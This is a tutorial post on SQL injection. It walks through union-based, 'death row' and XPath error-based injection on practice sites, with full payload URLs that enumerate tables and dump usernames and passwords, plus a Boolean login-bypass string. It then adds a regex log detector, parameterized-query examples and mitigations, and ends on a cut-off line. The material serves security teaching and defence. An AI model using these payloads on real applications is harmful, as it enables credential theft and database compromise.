SQL Injection and its Mitigation
Structured Query Language (SQL) is used to manage data in a database management system. SQL is used for creating databases, fetching rows, and deleting and modifying rows, among other operations.
The most commonly used SQL keywords are SELECT, WHERE, FROM, INSERT, DELETE and UPDATE.
In a web application, if database access is not configured properly, the resulting flaws allow an attacker to attack the database and take it over.
SQL injection is the most prominent attack on SQL databases; it is used to extract database information and compromise the database.
In SQL injection, SQL statements are passed as input so that they become part of the application's query. These statements give control over the database. Using SQL injection, an attacker can bypass authentication and retrieve the entire database contents.
Most common types of SQL injection
- Union-based SQL injection: the UNION operator is added to the injected SQL statement so that the results of additional queries are appended to the original result.
- Error-based SQL injection: the attacker passes a SQL payload that produces an error in the result. The error message leaks the required information and helps in compromising the database.
- Blind SQL injection: one of the hardest kinds. No error is returned, so the result has to be inferred by asking the database questions through the query. Blind injection is of two types: Boolean-based injection and time-based injection.
- Out-of-band SQL injection: a different channel is used to pass the query and to take the result out.
To know more about SQL injection, go through the OWASP 2017 Top 10 and also follow this link: https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)
By using SQL injection an invader can successfully:
- Compromise the database server and add, delete or edit the contents of the database.
- Bypass security authentication and impersonate any user.
- Delete all data from the database, causing financial destruction for a corporation.
- Steal data such as credit card details, user credentials and personal information for personal benefit or to damage the standing of the company.
- Tamper with data in the database, such as the cost of a product or transaction details, so as to affect data integrity and cause repudiation issues for the corporation.
How to do SQL injection testing for vulnerability analysis:
Start with testing platforms like DVWA or WebGoat, or go to websites like http://leettime.net/ or http://testphp.vulnweb.com/ etc.
We will start with basic SQL injection. Choose the first challenge. The URL for testing is: http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1
Here a single quote (') is appended to the parameter to trigger a SQL error, which reveals how the query is built. The URL is: http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'
Now we gather information about the number of columns; for this we use the ORDER BY clause. Here order by 1 means sort the result set by the values of the first column. On increasing the number, at some point the output becomes "Unknown column". Decrementing that order by value by 1 gives the number of columns that exist.
Using a UNION SELECT statement we find the vulnerable column number. The query passed is: http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' union select 1,2,3--+
Using this SQL statement we gather information about the web app, here the database name, version, etc.
[Screenshot: result showing DATABASE NAME and Version]
Now we pass a SQL statement to retrieve the names of the tables that exist in the database. For that we pass the query: http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' union select 1,concat(table_name),3 from information_schema.tables where table_schema=database()--+
From the table "users" we now collect the column names of this particular table. The statement used for this is: http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' union select 1,concat(column_name),3 from information_schema.columns where table_schema=database() and table_name="users"--+
And finally we collect the username and password from the database using the query: http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' union select 1,concat(username,0x3a,password,0x3a,sec_code),3 from users--+
Now I will show you how to work on the "death row" situation. The link is: http://leettime.net/sqlninja.com/tasks/deathrow_ch1.php?id=1
Now we pass the quote (') to get the error, and from the error we learn how it has to be handled. After handling the error we get the result shown below.
Using the order by query we get the "unknown column" error on "order by 6", so 5 is the number of columns.
Now, using union select, we are not able to see the vulnerable column. For the death row condition we put "-" in the id= parameter, so that the original row is not returned and the row from the union shows the vulnerable column. The query is: http://leettime.net/sqlninja.com/tasks/deathrow_ch1.php?id=-1' union select 1,2,3,4,5--+
Now we follow the same steps as in the basic injection to get the table_name and column_name by passing the corresponding queries. From the table users we then get the credentials as follows.
Sometimes the above method does not give us useful data, so we use the XPath method to get the result. The link for testing is: http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1. We trigger the error by passing a quote in the statement.
We fix this error by using "))" to close the open parentheses.
From the query we find that there is only one column, so we cannot retrieve any info through union select. So now we go for the XPath query.
Now we pass the SQL statement: http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1)) and extractvalue(null,concat(0x0a,database()))--+ and we get the database name as below.
To get the table names we need a LIMIT clause, because the subquery would otherwise return more than one row. The query is: http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1)) and extractvalue(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))--+ . For the other tables change limit 0,1 to limit 1,1, limit 2,1 and so on while data exists.
In a similar way we obtain the column names. The statement for getting a column name is: http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1)) and extractvalue(null,concat(0x0a,(select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1)))--+
At last we pass a statement to get the username and password of the users. The statement is: http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1)) and extractvalue(null,concat(0x0a,(select concat(username,0x3a,password) from users limit 0,1)))--+
Now we focus on a login panel, where we pass a Boolean condition as the username, 'or'=' --+ , together with any random password, which gives us login access to the web application.
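As an added example (not part of the original post), a small detector that uses the payload shapes from the walkthrough above as indicators and runs them over constructed web-server access-log lines; the log lines, client IP address and request paths are made up for this example:

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access log. The request paths reuse the payload
# shapes from the walkthrough (quote probe, order by, union select,
# information_schema enumeration, extractvalue); the IP is a documentation address.
LOG = """\
203.0.113.5 - - [10/Oct/2020:13:55:36 +0000] "GET /tasks/basic_ch1.php?id=1 HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2020:13:55:40 +0000] "GET /tasks/basic_ch1.php?id=1%27%20order%20by%204--+ HTTP/1.1" 500 214
203.0.113.5 - - [10/Oct/2020:13:55:48 +0000] "GET /tasks/basic_ch1.php?id=-1%27%20union%20select%201,2,3--+ HTTP/1.1" 200 530
203.0.113.5 - - [10/Oct/2020:13:55:55 +0000] "GET /tasks/basic_ch1.php?id=1%27%20union%20select%201,concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+ HTTP/1.1" 200 540
203.0.113.5 - - [10/Oct/2020:13:56:02 +0000] "GET /tasks/xpath_ch1.php?id=1))%20and%20extractvalue(null,concat(0x0a,database()))--+ HTTP/1.1" 500 260
"""

# Each indicator is a name plus a regex applied to the URL-decoded request path.
INDICATORS = [
    ("quote_probe", re.compile(r"=-?\d+'")),
    ("order_by_enum", re.compile(r"'\s*order\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"union\s+select", re.I)),
    ("schema_enum", re.compile(r"information_schema\.", re.I)),
    ("xpath_error", re.compile(r"extractvalue\s*\(", re.I)),
    ("comment_tail", re.compile(r"--\s*$")),
]

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def indicators_for(path):
    """Names of the indicators that fire on one raw request path."""
    # unquote_plus turns %27 into a quote and '+' into a space, which is
    # exactly how the tutorial's trailing --+ becomes a '-- ' comment.
    decoded = unquote_plus(path)
    return [name for name, rx in INDICATORS if rx.search(decoded)]


def scan_log(text):
    """Return (client_ip, path, indicators) for each request that fires an indicator."""
    hits = []
    for line in text.splitlines():
        m = REQUEST.search(line)
        if not m:
            continue
        names = indicators_for(m.group(1))
        if names:
            hits.append((line.split()[0], m.group(1), names))
    return hits
```

Pattern matching like this only flags the request shapes seen in the tutorial and is easily evaded by encoding or rewording, so it is a detection aid for a WAF or log review, not a substitute for the mitigations below.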
Mitigation for SQL injection
· The primary defence against SQL injection is to use parameterized queries (prepared statements). The developer defines the SQL code first and then passes each input as a separate parameter, which allows the database to distinguish between code and data.
· Allow-listing and validation of input, or a redesign of the query, is one of the dominant mitigations.
· Escape user-supplied input so that injected statements are not executed; use of encoders is a best practice.
· Personal data should be passed and stored in a hashed format.
· Use a WAF for better protection.
· Assign privileges according to the rights of each user to minimise the impact of SQL injection.
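As an added example (not code from the original post), the concatenated login query beside its parameterized form, plus an allow-list check for the id parameter, in Python with an in-memory SQLite table that stands in for the tutorial's users table; the table contents and the ' or ''='' -- Boolean payload are constructed for this example:

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the tutorial's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, sec_code TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'hunter2', 'A1')")  # made-up row
    return conn


def login_vulnerable(conn, username, password):
    """Login built by string concatenation: code and data are not separated.

    A username of  ' or ''='' --  turns the WHERE clause into
    username='' or ''='' --' AND password='...'  and the password check is
    commented out, which is the Boolean bypass described in the walkthrough.
    """
    sql = ("SELECT username FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Same query with placeholders: the values are sent separately from the SQL
    text, so a quote inside the input can never terminate the string literal."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def validate_id(raw):
    """Allow-list check for a numeric id parameter such as ?id=1.

    Returns the integer, or None when the value contains anything but digits,
    so inputs like  1'  or  -1' union select ...  are rejected before any
    query is built.
    """
    return int(raw) if raw.isdigit() else None
```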
For
remedies recommend: